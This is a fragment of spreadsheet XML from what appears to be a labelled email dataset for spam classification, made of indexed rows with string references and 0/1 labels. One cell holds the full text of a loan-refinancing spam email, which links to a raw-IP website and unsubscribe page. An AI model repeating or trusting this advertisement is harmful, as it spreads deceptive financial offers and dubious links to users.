    <row r="1428">
      <c r="A1428" s="1">
        <v>1426.0</v>
      </c>
      <c r="B1428" s="1" t="s">
        <v>2485</v>
      </c>
      <c r="C1428" s="1" t="s">
        <v>2486</v>
      </c>
      <c r="D1428" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1429" hidden="1">
      <c r="A1429" s="1">
        <v>1427.0</v>
      </c>
      <c r="B1429" s="1" t="s">
        <v>2487</v>
      </c>
      <c r="C1429" s="1" t="s">
        <v>2488</v>
      </c>
      <c r="D1429" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1430">
      <c r="A1430" s="1">
        <v>1428.0</v>
      </c>
      <c r="B1430" s="1" t="s">
        <v>2489</v>
      </c>
      <c r="C1430" s="3" t="str">
        <f>=========================================================================
 Now you can have HUNDREDS of lenders compete for your loan!
 FACT: Interest Rates are at their lowest point in 40 years!
 You're eligible even with less than perfect credit !!
 	* Refinancing
 	* New Home Loans
 	* Debt Consolidation
 	* Debt Consultation
 	* Auto Loans
 	* Credit Cards
 	* Student Loans
 	* Second Mortgage
 	* Home Equity
 This Service is 100% FREE without any obligation.
 Visit Our Web Site at:  http://61.129.68.19/user0201/index.asp?Afft=QM3
 ============================================================================
 To Unsubscribe: http://61.129.68.19/light/watch.asp
</f>
        <v>#ERROR!</v>
      </c>
      <c r="D1430" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1431" hidden="1">
      <c r="A1431" s="1">
        <v>1429.0</v>
      </c>
      <c r="B1431" s="1" t="s">
        <v>512</v>
      </c>
      <c r="C1431" s="1" t="s">
        <v>2490</v>
      </c>
      <c r="D1431" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1432" hidden="1">
      <c r="A1432" s="1">
        <v>1430.0</v>
      </c>
      <c r="B1432" s="1" t="s">
        <v>497</v>
      </c>
      <c r="C1432" s="1" t="s">
        <v>2491</v>
      </c>
      <c r="D1432" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1433" hidden="1">
      <c r="A1433" s="1">
        <v>1431.0</v>
      </c>
      <c r="B1433" s="1" t="s">
        <v>2492</v>
      </c>
      <c r="C1433" s="1" t="s">
        <v>2493</v>
      </c>
      <c r="D1433" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1434" hidden="1">
      <c r="A1434" s="1">
        <v>1432.0</v>
      </c>
      <c r="B1434" s="1" t="s">
        <v>2494</v>
      </c>
      <c r="C1434" s="1" t="s">
        <v>2495</v>
      </c>
      <c r="D1434" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1435" hidden="1">
      <c r="A1435" s="1">
        <v>1433.0</v>
      </c>
      <c r="B1435" s="1" t="s">
        <v>2496</v>
      </c>
      <c r="C1435" s="1" t="s">
        <v>2497</v>
      </c>
      <c r="D1435" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1436" hidden="1">
      <c r="A1436" s="1">
        <v>1434.0</v>
      </c>
      <c r="B1436" s="1" t="s">
        <v>488</v>
      </c>
      <c r="C1436" s="1" t="s">
        <v>489</v>
      </c>
      <c r="D1436" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1437" hidden="1">
      <c r="A1437" s="1">
        <v>1435.0</v>
      </c>
      <c r="B1437" s="1" t="s">
        <v>2498</v>
      </c>
      <c r="C1437" s="1" t="s">
        <v>2499</v>
      </c>
      <c r="D1437" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1438" hidden="1">
      <c r="A1438" s="1">
        <v>1436.0</v>
      </c>
      <c r="B1438" s="1" t="s">
        <v>549</v>
      </c>
      <c r="C1438" s="1" t="s">
        <v>2500</v>
      </c>
      <c r="D1438" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1439">
      <c r="A1439" s="1">
        <v>1437.0</v>
      </c>
      <c r="B1439" s="1" t="s">
        <v>2501</v>
      </c>
      <c r="C1439" s="1" t="s">
        <v>2502</v>
      </c>
      <c r="D1439" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1440" hidden="1">
      <c r="A1440" s="1">
        <v>1438.0</v>
      </c>
      <c r="B1440" s="1" t="s">
        <v>426</v>
      </c>
      <c r="C1440" s="1" t="s">
        <v>2503</v>
      </c>
      <c r="D1440" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1441">
      <c r="A1441" s="1">
        <v>1439.0</v>
      </c>
      <c r="B1441" s="1" t="s">
        <v>2504</v>
      </c>
      <c r="C1441" s="1" t="s">
        <v>2505</v>
      </c>
      <c r="D1441" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1442" hidden="1">
      <c r="A1442" s="1">
        <v>1440.0</v>
      </c>
      <c r="B1442" s="1" t="s">
        <v>2506</v>
      </c>
      <c r="C1442" s="1" t="s">
        <v>2507</v>
      </c>
      <c r="D1442" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1443" hidden="1">
      <c r="A1443" s="1">
        <v>1441.0</v>
      </c>
      <c r="B1443" s="1" t="s">
        <v>2508</v>
      </c>
      <c r="C1443" s="1" t="s">
        <v>2509</v>
      </c>
      <c r="D1443" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1444" hidden="1">
      <c r="A1444" s="1">
        <v>1442.0</v>
      </c>
      <c r="B1444" s="1" t="s">
        <v>2510</v>
      </c>
      <c r="C1444" s="1" t="s">
        <v>2511</v>
      </c>
      <c r="D1444" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1445" hidden="1">
      <c r="A1445" s="1">
        <v>1443.0</v>
      </c>
      <c r="B1445" s="1" t="s">
        <v>1558</v>
      </c>
      <c r="C1445" s="1" t="s">
        <v>2512</v>
      </c>
      <c r="D1445" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1446" hidden="1">
      <c r="A1446" s="1">
        <v>1444.0</v>
      </c>
      <c r="B1446" s="1" t="s">
        <v>2513</v>
      </c>
      <c r="C1446" s="1" t="s">
        <v>2514</v>
      </c>
      <c r="D1446" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1447" hidden="1">
      <c r="A1447" s="1">
        <v>1445.0</v>
      </c>
      <c r="B1447" s="1" t="s">
        <v>93</v>
      </c>
      <c r="C1447" s="1" t="s">
        <v>265</v>
      </c>
      <c r="D1447" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1448" hidden="1">
      <c r="A1448" s="1">
        <v>1446.0</v>
      </c>
      <c r="B1448" s="1" t="s">
        <v>1433</v>
      </c>
      <c r="C1448" s="1" t="s">
        <v>2515</v>
      </c>
      <c r="D1448" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1449" hidden="1">
      <c r="A1449" s="1">
        <v>1447.0</v>
      </c>
      <c r="B1449" s="1" t="s">
        <v>1872</v>
      </c>
      <c r="C1449" s="1" t="s">
        <v>1873</v>
      </c>
      <c r="D1449" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1450" hidden="1">
      <c r="A1450" s="1">
        <v>1448.0</v>
      </c>
      <c r="B1450" s="1" t="s">
        <v>1035</v>
      </c>
      <c r="C1450" s="1" t="s">
        <v>1036</v>
      </c>
      <c r="D1450" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1451" hidden="1">
      <c r="A1451" s="1">
        <v>1449.0</v>
      </c>
      <c r="B1451" s="1" t="s">
        <v>2516</v>
      </c>
      <c r="C1451" s="1" t="s">
        <v>2517</v>
      </c>
      <c r="D1451" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1452" hidden="1">
      <c r="A1452" s="1">
        <v>1450.0</v>
      </c>
      <c r="B1452" s="1" t="s">
        <v>2518</v>
      </c>
      <c r="C1452" s="1" t="s">
        <v>2519</v>
      </c>
      <c r="D1452" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1453">
      <c r="A1453" s="1">
        <v>1451.0</v>
      </c>
      <c r="B1453" s="1" t="s">
        <v>2520</v>
      </c>
      <c r="C1453" s="1" t="s">
        <v>2521</v>
      </c>
      <c r="D1453" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1454" hidden="1">
      <c r="A1454" s="1">
        <v>1452.0</v>
      </c>
      <c r="B1454" s="1" t="s">
        <v>1496</v>
      </c>
      <c r="C1454" s="1" t="s">
        <v>2522</v>
      </c>
      <c r="D1454" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1455" hidden="1">
      <c r="A1455" s="1">
        <v>1453.0</v>
      </c>
      <c r="B1455" s="1" t="s">
        <v>904</v>
      </c>
      <c r="C1455" s="1" t="s">
        <v>2523</v>
      </c>
      <c r="D1455" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1456" hidden="1">
      <c r="A1456" s="1">
        <v>1454.0</v>
      </c>
      <c r="B1456" s="1" t="s">
        <v>2524</v>
      </c>
      <c r="C1456" s="1" t="s">
        <v>2525</v>
      </c>
      <c r="D1456" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1457" hidden="1">
      <c r="A1457" s="1">
        <v>1455.0</v>
      </c>
      <c r="B1457" s="1" t="s">
        <v>525</v>
      </c>
      <c r="C1457" s="1" t="s">
        <v>2526</v>
      </c>
      <c r="D1457" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1458" hidden="1">
      <c r="A1458" s="1">
        <v>1456.0</v>
      </c>
      <c r="B1458" s="1" t="s">
        <v>2527</v>
      </c>
      <c r="C1458" s="1" t="s">
        <v>2528</v>
      </c>
      <c r="D1458" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1459" hidden="1">
      <c r="A1459" s="1">
        <v>1457.0</v>
      </c>
      <c r="B1459" s="1" t="s">
        <v>347</v>
      </c>
      <c r="C1459" s="1" t="s">
        <v>2529</v>
      </c>
      <c r="D1459" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1460" hidden="1">
      <c r="A1460" s="1">
        <v>1458.0</v>
      </c>
      <c r="B1460" s="1" t="s">
        <v>2530</v>
      </c>
      <c r="C1460" s="1" t="s">
        <v>2531</v>
      </c>
      <c r="D1460" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1461" hidden="1">
      <c r="A1461" s="1">
        <v>1459.0</v>
      </c>
      <c r="B1461" s="1" t="s">
        <v>1116</v>
      </c>
      <c r="C1461" s="1" t="s">
        <v>1198</v>
      </c>
      <c r="D1461" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1462" hidden="1">
      <c r="A1462" s="1">
        <v>1460.0</v>
      </c>
      <c r="B1462" s="1" t="s">
        <v>663</v>
      </c>
      <c r="C1462" s="1" t="s">
        <v>2532</v>
      </c>
      <c r="D1462" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1463" hidden="1">
      <c r="A1463" s="1">
        <v>1461.0</v>
      </c>
      <c r="B1463" s="1" t="s">
        <v>1797</v>
      </c>
      <c r="C1463" s="1" t="s">
        <v>2063</v>
      </c>
      <c r="D1463" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1464" hidden="1">
      <c r="A1464" s="1">
        <v>1462.0</v>
      </c>
      <c r="B1464" s="1" t="s">
        <v>2533</v>
      </c>
      <c r="C1464" s="1" t="s">
        <v>2534</v>
      </c>
      <c r="D1464" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1465" hidden="1">
      <c r="A1465" s="1">
        <v>1463.0</v>
      </c>
      <c r="B1465" s="1" t="s">
        <v>1684</v>
      </c>
      <c r="C1465" s="1" t="s">
        <v>2535</v>
      </c>
      <c r="D1465" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1466" hidden="1">
      <c r="A1466" s="1">
        <v>1464.0</v>
      </c>
      <c r="B1466" s="1" t="s">
        <v>1165</v>
      </c>
      <c r="C1466" s="1" t="s">
        <v>2536</v>
      </c>
      <c r="D1466" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1467" hidden="1">
      <c r="A1467" s="1">
        <v>1465.0</v>
      </c>
      <c r="B1467" s="1" t="s">
        <v>2537</v>
      </c>
      <c r="C1467" s="1" t="s">
        <v>2538</v>
      </c>
      <c r="D1467" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1468" hidden="1">
      <c r="A1468" s="1">
        <v>1466.0</v>
      </c>
      <c r="B1468" s="1" t="s">
        <v>2539</v>
      </c>
      <c r="C1468" s="1" t="s">
        <v>2540</v>
      </c>
      <c r="D1468" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1469" hidden="1">
      <c r="A1469" s="1">
        <v>1467.0</v>
      </c>
      <c r="B1469" s="1" t="s">
        <v>1858</v>
      </c>
      <c r="C1469" s="1" t="s">
        <v>1859</v>
      </c>
      <c r="D1469" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1470">
      <c r="A1470" s="1">
        <v>1468.0</v>
      </c>
      <c r="B1470" s="1" t="s">
        <v>2541</v>
      </c>
      <c r="C1470" s="1" t="s">
        <v>2542</v>
      </c>
      <c r="D1470" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1471">
      <c r="A1471" s="1">
        <v>1469.0</v>
      </c>
      <c r="B1471" s="1" t="s">
        <v>2543</v>
      </c>
      <c r="C1471" s="1" t="s">
        <v>2544</v>
      </c>
      <c r="D1471" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1472" hidden="1">
      <c r="A1472" s="1">
        <v>1470.0</v>
      </c>
      <c r="B1472" s="1" t="s">
        <v>2545</v>
      </c>
      <c r="C1472" s="1" t="s">
        <v>2546</v>
      </c>
      <c r="D1472" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1473" hidden="1">
      <c r="A1473" s="1">
        <v>1471.0</v>
      </c>
      <c r="B1473" s="1" t="s">
        <v>949</v>
      </c>
      <c r="C1473" s="1" t="s">
        <v>2547</v>
      </c>
      <c r="D1473" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1474" hidden="1">
      <c r="A1474" s="1">
        <v>1472.0</v>
      </c>
      <c r="B1474" s="1" t="s">
        <v>2548</v>
      </c>
      <c r="C1474" s="1" t="s">
        <v>2549</v>
      </c>
      <c r="D1474" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1475" hidden="1">
      <c r="A1475" s="1">
        <v>1473.0</v>
      </c>
      <c r="B1475" s="1" t="s">
        <v>2550</v>
      </c>
      <c r="C1475" s="1" t="s">
        <v>2551</v>
      </c>
      <c r="D1475" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1476">
      <c r="A1476" s="1">
        <v>1474.0</v>
      </c>
      <c r="B1476" s="1" t="s">
        <v>2552</v>
      </c>
      <c r="C1476" s="1" t="s">
        <v>2553</v>
      </c>
      <c r="D1476" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1477" hidden="1">
      <c r="A1477" s="1">
        <v>1475.0</v>
      </c>
      <c r="B1477" s="1" t="s">
        <v>2554</v>
      </c>
      <c r="C1477" s="1" t="s">
        <v>2555</v>
      </c>
      <c r="D1477" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1478" hidden="1">
      <c r="A1478" s="1">
        <v>1476.0</v>
      </c>
      <c r="B1478" s="1" t="s">
        <v>2556</v>
      </c>
      <c r="C1478" s="1" t="s">
        <v>2557</v>
      </c>
      <c r="D1478" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1479" hidden="1">
      <c r="A1479" s="1">
        <v>1477.0</v>
      </c>
      <c r="B1479" s="1" t="s">
        <v>2558</v>
      </c>
      <c r="C1479" s="1" t="s">
        <v>2559</v>
      </c>
      <c r="D1479" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1480" hidden="1">
      <c r="A1480" s="1">
        <v>1478.0</v>
      </c>
      <c r="B1480" s="1" t="s">
        <v>1727</v>
      </c>
      <c r="C1480" s="1" t="s">
        <v>1728</v>
      </c>
      <c r="D1480" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1481" hidden="1">
      <c r="A1481" s="1">
        <v>1479.0</v>
      </c>
      <c r="B1481" s="1" t="s">
        <v>30</v>
      </c>
      <c r="C1481" s="1" t="s">
        <v>1154</v>
      </c>
      <c r="D1481" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1482">
      <c r="A1482" s="1">
        <v>1480.0</v>
      </c>
      <c r="B1482" s="1" t="s">
        <v>2560</v>
      </c>
      <c r="C1482" s="1" t="s">
        <v>2561</v>
      </c>
      <c r="D1482" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1483">
      <c r="A1483" s="1">
        <v>1481.0</v>
      </c>
      <c r="B1483" s="1" t="s">
        <v>2562</v>
      </c>
      <c r="C1483" s="1" t="s">
        <v>2563</v>
      </c>
      <c r="D1483" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1484" hidden="1">
      <c r="A1484" s="1">
        <v>1482.0</v>
      </c>
      <c r="B1484" s="1" t="s">
        <v>2564</v>
      </c>
      <c r="C1484" s="1" t="s">
        <v>2565</v>
      </c>
      <c r="D1484" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1485" hidden="1">
      <c r="A1485" s="1">
        <v>1483.0</v>
      </c>
      <c r="B1485" s="1" t="s">
        <v>2566</v>
      </c>
      <c r="C1485" s="1" t="s">
        <v>2567</v>
      </c>
      <c r="D1485" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1486" hidden="1">
      <c r="A1486" s="1">
        <v>1484.0</v>
      </c>
      <c r="B1486" s="1" t="s">
        <v>486</v>
      </c>
      <c r="C1486" s="1" t="s">
        <v>2568</v>
      </c>
      <c r="D1486" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1487" hidden="1">
      <c r="A1487" s="1">
        <v>1485.0</v>
      </c>
      <c r="B1487" s="1" t="s">
        <v>2569</v>
      </c>
      <c r="C1487" s="1" t="s">
        <v>2570</v>
      </c>
      <c r="D1487" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1488" hidden="1">
      <c r="A1488" s="1">
        <v>1486.0</v>
      </c>
      <c r="B1488" s="1" t="s">
        <v>2571</v>
      </c>
      <c r="C1488" s="1" t="s">
        <v>2572</v>
      </c>
      <c r="D1488" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1489" hidden="1">
      <c r="A1489" s="1">
        <v>1487.0</v>
      </c>
      <c r="B1489" s="1" t="s">
        <v>2573</v>
      </c>
      <c r="C1489" s="1" t="s">
        <v>2574</v>
      </c>
      <c r="D1489" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1490" hidden="1">
      <c r="A1490" s="1">
        <v>1488.0</v>
      </c>
      <c r="B1490" s="1" t="s">
        <v>261</v>
      </c>
      <c r="C1490" s="1" t="s">
        <v>2575</v>
      </c>
      <c r="D1490" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1491" hidden="1">
      <c r="A1491" s="1">
        <v>1489.0</v>
      </c>
      <c r="B1491" s="1" t="s">
        <v>361</v>
      </c>
      <c r="C1491" s="1" t="s">
        <v>2576</v>
      </c>
      <c r="D1491" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1492" hidden="1">
      <c r="A1492" s="1">
        <v>1490.0</v>
      </c>
      <c r="B1492" s="1" t="s">
        <v>2577</v>
      </c>
      <c r="C1492" s="1" t="s">
        <v>2578</v>
      </c>
      <c r="D1492" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1493">
      <c r="A1493" s="1">
        <v>1491.0</v>
      </c>
      <c r="B1493" s="1" t="s">
        <v>46</v>
      </c>
      <c r="C1493" s="1" t="s">
        <v>2579</v>
      </c>
      <c r="D1493" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1494">
      <c r="A1494" s="1">
        <v>1492.0</v>
      </c>
      <c r="B1494" s="1" t="s">
        <v>2580</v>
      </c>
      <c r="C1494" s="1" t="s">
        <v>2581</v>
      </c>
      <c r="D1494" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1495" hidden="1">
      <c r="A1495" s="1">
        <v>1493.0</v>
      </c>
      <c r="B1495" s="1" t="s">
        <v>2123</v>
      </c>
      <c r="C1495" s="1" t="s">
        <v>2124</v>
      </c>
      <c r="D1495" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1496" hidden="1">
      <c r="A1496" s="1">
        <v>1494.0</v>
      </c>
      <c r="B1496" s="1" t="s">
        <v>1139</v>
      </c>
      <c r="C1496" s="1" t="s">
        <v>2582</v>
      </c>
      <c r="D1496" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1497" hidden="1">
      <c r="A1497" s="1">
        <v>1495.0</v>
      </c>
      <c r="B1497" s="1" t="s">
        <v>2583</v>
      </c>
      <c r="C1497" s="1" t="s">
        <v>2584</v>
      </c>
      <c r="D1497" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1498" hidden="1">
      <c r="A1498" s="1">
        <v>1496.0</v>
      </c>
      <c r="B1498" s="1" t="s">
        <v>889</v>
      </c>
      <c r="C1498" s="1" t="s">
        <v>2585</v>
      </c>
      <c r="D1498" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1499">
      <c r="A1499" s="1">
        <v>1497.0</v>
      </c>
      <c r="B1499" s="1" t="s">
        <v>2586</v>
      </c>
      <c r="C1499" s="1" t="s">
        <v>2587</v>
      </c>
      <c r="D1499" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1500" hidden="1">
      <c r="A1500" s="1">
        <v>1498.0</v>
      </c>
      <c r="B1500" s="1" t="s">
        <v>1183</v>
      </c>
      <c r="C1500" s="1" t="s">
        <v>2588</v>
      </c>
      <c r="D1500" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1501" hidden="1">
      <c r="A1501" s="1">
        <v>1499.0</v>
      </c>
      <c r="B1501" s="1" t="s">
        <v>2589</v>
      </c>
      <c r="C1501" s="1" t="s">
        <v>2590</v>
      </c>
      <c r="D1501" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1502" hidden="1">
      <c r="A1502" s="1">
        <v>1500.0</v>
      </c>
      <c r="B1502" s="1" t="s">
        <v>2591</v>
      </c>
      <c r="C1502" s="1" t="s">
        <v>2592</v>
      </c>
      <c r="D1502" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1503" hidden="1">
      <c r="A1503" s="1">
        <v>1501.0</v>
      </c>
      <c r="B1503" s="1" t="s">
        <v>2593</v>
      </c>
      <c r="C1503" s="1" t="s">
        <v>2594</v>
      </c>
      <c r="D1503" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1504" hidden="1">
      <c r="A1504" s="1">
        <v>1502.0</v>
      </c>
      <c r="B1504" s="1" t="s">
        <v>1157</v>
      </c>
      <c r="C1504" s="1" t="s">
        <v>2595</v>
      </c>
      <c r="D1504" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1505" hidden="1">
      <c r="A1505" s="1">
        <v>1503.0</v>
      </c>
      <c r="B1505" s="1" t="s">
        <v>187</v>
      </c>
      <c r="C1505" s="1" t="s">
        <v>2596</v>
      </c>
      <c r="D1505" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1506">
      <c r="A1506" s="1">
        <v>1504.0</v>
      </c>
      <c r="B1506" s="1" t="s">
        <v>2597</v>
      </c>
      <c r="C1506" s="1" t="s">
        <v>2598</v>
      </c>
      <c r="D1506" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1507" hidden="1">
      <c r="A1507" s="1">
        <v>1505.0</v>
      </c>
      <c r="B1507" s="1" t="s">
        <v>2599</v>
      </c>
      <c r="C1507" s="1" t="s">
        <v>2600</v>
      </c>
      <c r="D1507" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1508" hidden="1">
      <c r="A1508" s="1">
        <v>1506.0</v>
      </c>
      <c r="B1508" s="1" t="s">
        <v>2601</v>
      </c>
      <c r="C1508" s="1" t="s">
        <v>2602</v>
      </c>
      <c r="D1508" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1509" hidden="1">
      <c r="A1509" s="1">
        <v>1507.0</v>
      </c>
      <c r="B1509" s="1" t="s">
        <v>2603</v>
      </c>
      <c r="C1509" s="1" t="s">
        <v>2604</v>
      </c>
      <c r="D1509" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1510" hidden="1">
      <c r="A1510" s="1">
        <v>1508.0</v>
      </c>
      <c r="B1510" s="1" t="s">
        <v>353</v>
      </c>
      <c r="C1510" s="1" t="s">
        <v>354</v>
      </c>
      <c r="D1510" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1511" hidden="1">
      <c r="A1511" s="1">
        <v>1509.0</v>
      </c>
      <c r="B1511" s="1" t="s">
        <v>2605</v>
      </c>
      <c r="C1511" s="1" t="s">
        <v>2606</v>
      </c>
      <c r="D1511" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1512" hidden="1">
      <c r="A1512" s="1">
        <v>1510.0</v>
      </c>
      <c r="B1512" s="1" t="s">
        <v>2607</v>
      </c>
      <c r="C1512" s="1" t="s">
        <v>2608</v>
      </c>
      <c r="D1512" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1513" hidden="1">
      <c r="A1513" s="1">
        <v>1511.0</v>
      </c>
      <c r="B1513" s="1" t="s">
        <v>369</v>
      </c>
      <c r="C1513" s="1" t="s">
        <v>2609</v>
      </c>
      <c r="D1513" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1514" hidden="1">
      <c r="A1514" s="1">
        <v>1512.0</v>
      </c>
      <c r="B1514" s="1" t="s">
        <v>2610</v>
      </c>
      <c r="C1514" s="1" t="s">
        <v>2611</v>
      </c>
      <c r="D1514" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1515" hidden="1">
      <c r="A1515" s="1">
        <v>1513.0</v>
      </c>
      <c r="B1515" s="1" t="s">
        <v>2612</v>
      </c>
      <c r="C1515" s="1" t="s">
        <v>2613</v>
      </c>
      <c r="D1515" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1516" hidden="1">
      <c r="A1516" s="1">
        <v>1514.0</v>
      </c>
      <c r="B1516" s="1" t="s">
        <v>2614</v>
      </c>
      <c r="C1516" s="1" t="s">
        <v>2615</v>
      </c>
      <c r="D1516" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1517">
      <c r="A1517" s="1">
        <v>1515.0</v>
      </c>
      <c r="B1517" s="1" t="s">
        <v>2616</v>
      </c>
      <c r="C1517" s="1" t="s">
        <v>2617</v>
      </c>
      <c r="D1517" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1518">
      <c r="A1518" s="1">
        <v>1516.0</v>
      </c>
      <c r="B1518" s="1" t="s">
        <v>2618</v>
      </c>
      <c r="C1518" s="1" t="s">
        <v>2619</v>
      </c>
      <c r="D1518" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1519" hidden="1">
      <c r="A1519" s="1">
        <v>1517.0</v>
      </c>
      <c r="B1519" s="1" t="s">
        <v>1995</v>
      </c>
      <c r="C1519" s="1" t="s">
        <v>2620</v>
      </c>
      <c r="D1519" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1520" hidden="1">
      <c r="A1520" s="1">
        <v>1518.0</v>
      </c>
      <c r="B1520" s="1" t="s">
        <v>282</v>
      </c>
      <c r="C1520" s="1" t="s">
        <v>2621</v>
      </c>
      <c r="D1520" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1521" hidden="1">
      <c r="A1521" s="1">
        <v>1519.0</v>
      </c>
      <c r="B1521" s="1" t="s">
        <v>2622</v>
      </c>
      <c r="C1521" s="1" t="s">
        <v>2623</v>
      </c>
      <c r="D1521" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1522" hidden="1">
      <c r="A1522" s="1">
        <v>1520.0</v>
      </c>
      <c r="B1522" s="1" t="s">
        <v>2624</v>
      </c>
      <c r="C1522" s="1" t="s">
        <v>2625</v>
      </c>
      <c r="D1522" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1523" hidden="1">
      <c r="A1523" s="1">
        <v>1521.0</v>
      </c>
      <c r="B1523" s="1" t="s">
        <v>490</v>
      </c>
      <c r="C1523" s="1" t="s">
        <v>491</v>
      </c>
      <c r="D1523" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1524" hidden="1">
      <c r="A1524" s="1">
        <v>1522.0</v>
      </c>
      <c r="B1524" s="1" t="s">
        <v>2626</v>
      </c>
      <c r="C1524" s="1" t="s">
        <v>2627</v>
      </c>
      <c r="D1524" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1525" hidden="1">
      <c r="A1525" s="1">
        <v>1523.0</v>
      </c>
      <c r="B1525" s="1" t="s">
        <v>2628</v>
      </c>
      <c r="C1525" s="1" t="s">
        <v>2629</v>
      </c>
      <c r="D1525" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1526" hidden="1">
      <c r="A1526" s="1">
        <v>1524.0</v>
      </c>
      <c r="B1526" s="1" t="s">
        <v>361</v>
      </c>
      <c r="C1526" s="1" t="s">
        <v>2630</v>
      </c>
      <c r="D1526" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1527" hidden="1">
      <c r="A1527" s="1">
        <v>1525.0</v>
      </c>
      <c r="B1527" s="1" t="s">
        <v>497</v>
      </c>
      <c r="C1527" s="1" t="s">
        <v>2631</v>
      </c>
      <c r="D1527" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1528">
      <c r="A1528" s="1">
        <v>1526.0</v>
      </c>
      <c r="B1528" s="1" t="s">
        <v>2632</v>
      </c>
      <c r="C1528" s="1" t="s">
        <v>2633</v>
      </c>
      <c r="D1528" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1529">
